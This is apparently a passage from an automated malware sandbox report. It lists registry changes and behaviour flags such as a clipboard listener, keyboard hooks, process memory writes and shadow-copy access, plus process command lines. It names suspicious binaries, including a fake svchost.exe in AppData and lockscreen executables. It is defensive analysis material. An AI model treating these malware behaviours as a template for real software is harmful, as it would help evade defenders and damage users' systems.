| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2d | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2c | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2C | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2D | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133594126605321130" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2B | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\Net\1 = "C:\\ProgramData\\Package Cache\\{19AFE054-CA83-45D5-A9DB-4108EF4BD391}v14.38.33135\\packages\\vcRuntimeAdditional_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\88AAB0B9F51EF1A3CA0C2B609EDD7FC1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{19AFE054-CA83-45D5-A9DB-4108EF4BD391}v14.38.33135\\packages\\vcRuntimeAdditional_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\Version = "14.38.33135.0" | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\09A86F63C932FD435BC8463B1035EC53 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\Dependents\{c649ede4-f16a-4486-a117-dcc2f2a35165} | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8800A266DCF6DD54E97A86760485EA5D | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\88AAB0B9F51EF1A3CA0C2B609EDD7FC1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14\Dependents\{c649ede4-f16a-4486-a117-dcc2f2a35165} | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\ = "{c649ede4-f16a-4486-a117-dcc2f2a35165}" | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\Version = "237404527" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1162180587-977231257-2194346871-1000\{E13D8DD1-AFA3-4019-9CF8-8CD61803E834} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\PackageCode = "1688782943A356649B2B29F7077E1BE1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5BA8C0AA792764D40A9D8090F65EE964 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\INSTALLER\DEPENDENCIES\VC,REDIST.X64,AMD64,14.30,BUNDLE\DEPENDENTS\{57A73DF6-4BA9-4C1D-BBBB-517289FF6C13} | C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14\ = "{AA0C8AB5-7297-4D46-A0D9-08096FE59E46}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\SourceList\PackageName = "vc_runtimeMinimum_x64.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8A567BD6FA501A947AD1F646E53EEC14 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v14\ = "{19AFE054-CA83-45D5-A9DB-4108EF4BD391}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\DisplayName = "Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.38.33135" | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14 | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5BA8C0AA792764D40A9D8090F65EE964\VC_Runtime_Minimum | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\450EFA9138AC5D549ABD1480FEB43D19\VC_Runtime_Additional | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.38,bundle\Dependents | C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Documents" | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8800A266DCF6DD54E97A86760485EA5D\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{AA0C8AB5-7297-4D46-A0D9-08096FE59E46}v14.38.33135\\packages\\vcRuntimeMinimum_amd64\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\450EFA9138AC5D549ABD1480FEB43D19\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5BA8C0AA792764D40A9D8090F65EE964\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\68B2.tmp\CreepScreen.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29LockScreen.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://q
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb017eab58,0x7ffb017eab68,0x7ffb017eab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2224 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2980 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4496 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3328 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4536 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4976 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4944 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4300 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3176 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4980 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5052 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5032 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5024 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2976 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4940 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5152 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5316 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4400 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
